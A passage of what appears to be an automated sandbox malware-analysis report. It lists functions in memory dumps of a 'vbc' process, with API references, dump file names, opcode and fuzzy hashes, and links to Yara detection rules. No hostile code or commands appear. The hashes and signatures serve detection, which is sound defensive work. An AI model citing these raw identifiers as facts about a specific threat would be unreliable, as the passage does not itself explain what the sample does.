                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 011748e26750a68bcf8962441784c4abbc6476b243005cecf8b91d8003635da0
                                                                                                                                                  • Instruction ID: ee910141918acf4c831fb6c4db9286ffec496ad3ee2fe2b97bacc1beefdc9f29
                                                                                                                                                  • Opcode Fuzzy Hash: 011748e26750a68bcf8962441784c4abbc6476b243005cecf8b91d8003635da0
                                                                                                                                                  • Instruction Fuzzy Hash: 7D90027220191402D14075584845746001587D0301F95C011A5064758F8E598ED5AA65
                                                                                                                                                  Function 05612E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 13 5612e80-5612e8c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(0565809B,?,?,?,?,?), ref: 05612E8A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: e7be2412ce467ee3b56e167b24cfefe25c5c244d0ff11cc16611384a62842b39
                                                                                                                                                  • Instruction ID: 658dd7b6c0e19c2ec4a47a91af2503ebd83ddd690982bd8202029a07b10b4f5d
                                                                                                                                                  • Opcode Fuzzy Hash: e7be2412ce467ee3b56e167b24cfefe25c5c244d0ff11cc16611384a62842b39
                                                                                                                                                  • Instruction Fuzzy Hash: B190022260191502D10175584845616001A87D0241FD5C022A1024759FCE258A92E531
                                                                                                                                                  Function 05612B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 5 5612b60-5612b6c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05640DBD,?,?,?,?,05634302), ref: 05612B6A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: c82c0012cc684277f7eb2820094ee107f7f40dd31e38ccc867527f7a852dcf35
                                                                                                                                                  • Instruction ID: c960b27e4c1a8c4f8df99b1a42f07605f182d0d8bec20945eac36cf1881aff76
                                                                                                                                                  • Opcode Fuzzy Hash: c82c0012cc684277f7eb2820094ee107f7f40dd31e38ccc867527f7a852dcf35
                                                                                                                                                  • Instruction Fuzzy Hash: EC90026220291003410575584855616401A87E0201B95C021E1014794ECD258991A525
                                                                                                                                                  Function 05612BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 6 5612bf0-5612bfc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05627BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 05612BFA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1a3789bf97454350fc68cbedd334ddcbe8b3628fc290e85543b4b5c7c4c0b640
                                                                                                                                                  • Instruction ID: bd1f9fd6e40d529a242f69cb63fa191a90ef1827ffb3867c64cf11aa48127f5a
                                                                                                                                                  • Opcode Fuzzy Hash: 1a3789bf97454350fc68cbedd334ddcbe8b3628fc290e85543b4b5c7c4c0b640
                                                                                                                                                  • Instruction Fuzzy Hash: 9590023220191802D1807558484564A001587D1301FD5C015A0025758ECE158B59BBA1
                                                                                                                                                  Function 05612AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 4 5612ad0-5612adc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  • LdrInitializeThunk.NTDLL(05649864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0561034A,?,?,?,00000003), ref: 05612ADA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 0937e124abc96b511e11067e4015b933b7e05ef354aa2ed833b09bd79e90eb59
                                                                                                                                                  • Instruction ID: d9c0478968f2a712ece8b8beab326ed69ca0762eeda680f65d7ac4dc9e548ef8
                                                                                                                                                  • Opcode Fuzzy Hash: 0937e124abc96b511e11067e4015b933b7e05ef354aa2ed833b09bd79e90eb59
                                                                                                                                                  • Instruction Fuzzy Hash: A3900226211910030105B9580B45507005687D5351395C021F1015754DDE2189619521
                                                                                                                                                  Function 0041F074 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1857527976.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_41f000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 308c1089197b3fc969f318872f1b0b5110b826a2bbb36cdac941b51dfb57a097
                                                                                                                                                  • Instruction ID: e0c41d6df905e6c407450f47118526dbf0db78f192380a61be42cfff92b853c2
                                                                                                                                                  • Opcode Fuzzy Hash: 308c1089197b3fc969f318872f1b0b5110b826a2bbb36cdac941b51dfb57a097
                                                                                                                                                  • Instruction Fuzzy Hash: 31C02B714238143BC160D520CC434B4FB20D901328308034DFC49037038F237863C7C1
                                                                                                                                                  Function 0041F080 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1857527976.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_41f000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4f7dd743360f4df68f7be573f413038e00cc2a0e7e620416d517e22141e6a65e
                                                                                                                                                  • Instruction ID: 799c57cb42787c0bf5d1ce17ac39346a2abfc1e09e798fb22bcb30c317675207
                                                                                                                                                  • Opcode Fuzzy Hash: 4f7dd743360f4df68f7be573f413038e00cc2a0e7e620416d517e22141e6a65e
                                                                                                                                                  • Instruction Fuzzy Hash: A2A022A0C2830C03002030FA2B03023B30CC000008F8003EAAE8C022223C02A83300EB

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 05612890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 48624451-0
                                                                                                                                                  • Opcode ID: e9b61ce6a7188e01f09834d08b9464509a89ce63db43e00356385dac7e8b116d
                                                                                                                                                  • Instruction ID: cc50e4fac3b2ccf84e96ca7f4c0e6f27e9f3cb2d721fccc014d63afa025364fe
                                                                                                                                                  • Opcode Fuzzy Hash: e9b61ce6a7188e01f09834d08b9464509a89ce63db43e00356385dac7e8b116d
                                                                                                                                                  • Instruction Fuzzy Hash: 5A5139BAA04156BFCB10DF9EC99097EFBB9BB08200754C569E865D7641E634DE00CBE4
                                                                                                                                                  Function 0561B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                                                  • Instruction ID: 1415726cbf5397d2a55c6daac0fbc9d99ae5a5604aa2d309a481dec5fe392983
                                                                                                                                                  • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                                                  • Instruction Fuzzy Hash: 71819170E052499EDF24CE68C4517BEBBB2BF55710F1C4159DCA1A77B1CA349881CB6C
                                                                                                                                                  Function 05617D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                                                                  • Instruction ID: ea07530fd62f45ba5f1caafc14a1e32b7a112c86138f32744bbb7d8180c4c7ec
                                                                                                                                                  • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                                                                  • Instruction Fuzzy Hash: 8C918F71E0420A9EDB24DE69C881ABFB7A6FF44360F1C451AEC56E77C0DA309942CB5C
                                                                                                                                                  Function 055D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: 936d6768b4610695b92b6e5bfaa5899ed3a07fbd4d5b5ef1c5abaa4d93fd3cc3
                                                                                                                                                  • Instruction ID: d203773c07780a697cc742bbd315586f82abadb3e86ba9cdb186d5d96918f7f0
                                                                                                                                                  • Opcode Fuzzy Hash: 936d6768b4610695b92b6e5bfaa5899ed3a07fbd4d5b5ef1c5abaa4d93fd3cc3
                                                                                                                                                  • Instruction Fuzzy Hash: 3B812A76D002699BDB35CB94CC59BEAB7B5BF48710F0041EAE90AB7640D7709E84CFA4
                                                                                                                                                  Function 05615DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 05615E34
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.1858938516.00000000055C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000055A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005620000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005626000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.0000000005662000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.1858938516.00000000056C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_55a0000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                  • String ID: pow
                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                  • Opcode ID: cb8243b8541bd0673af223789d61896265c15a056897432f256554fdef265d05
                                                                                                                                                  • Instruction ID: 48aeb72a92f0792f6c896773936a7e69b0eaac2f27de40a4727ad7e3e439aeb8
                                                                                                                                                  • Opcode Fuzzy Hash: cb8243b8541bd0673af223789d61896265c15a056897432f256554fdef265d05
                                                                                                                                                  • Instruction Fuzzy Hash: 70517671E1C20596CB21B724C9067BEBF91FB80700F1C8959EC97867A8EE308495CF4E